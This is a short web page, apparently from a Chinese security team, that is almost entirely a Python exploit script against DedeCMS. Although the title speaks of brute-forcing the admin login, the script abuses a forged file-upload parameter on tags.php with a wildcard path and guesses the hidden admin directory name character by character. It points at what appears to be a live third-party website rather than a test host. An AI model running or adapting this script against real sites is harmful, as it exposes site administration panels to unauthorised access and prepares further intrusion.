DEDE暴力破解后台登录页面
DEDE暴力破解后台登录页面
1 #!/usr/bin/env python 2 '''/* 3 * author = Mochazz 4 * team = 红日安全团队 5 * env = pyton3 6 * 7 */ 8 ''' 9 import requests 10 import itertools 11 characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" 12 back_dir = "" 13 flag = 0 14 url = "http://www.rmjdw.com/tags.php" 15 data = { 16 "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif", 17 "_FILES[mochazz][name]" : 0, 18 "_FILES[mochazz][size]" : 0, 19 "_FILES[mochazz][type]" : "image/gif" 20 } 21 22 for num in range(1,7): 23 if flag: 24 break 25 for pre in itertools.permutations(characters,num): 26 pre = ''.join(list(pre)) 27 data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre) 28 print("testing",pre) 29 r = requests.post(url,data=data) 30 if "Upload filetype not allow !" not in r.text and r.status_code == 200: 31 flag = 1 32 back_dir = pre 33 data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" 34 break 35 else: 36 data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" 37 print("[+] 前缀为:",back_dir) 38 flag = 0 39 for i in range(30): 40 if flag: 41 break 42 for ch in characters: 43 if ch == characters[-1]: 44 flag = 1 45 break 46 data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch) 47 r = requests.post(url, data=data) 48 if "Upload filetype not allow !" not in r.text and r.status_code == 200: 49 back_dir += ch 50 print("[+] ",back_dir) 51 data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" 52 break 53 else: 54 data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" 55 56 print("后台地址为:",back_dir)
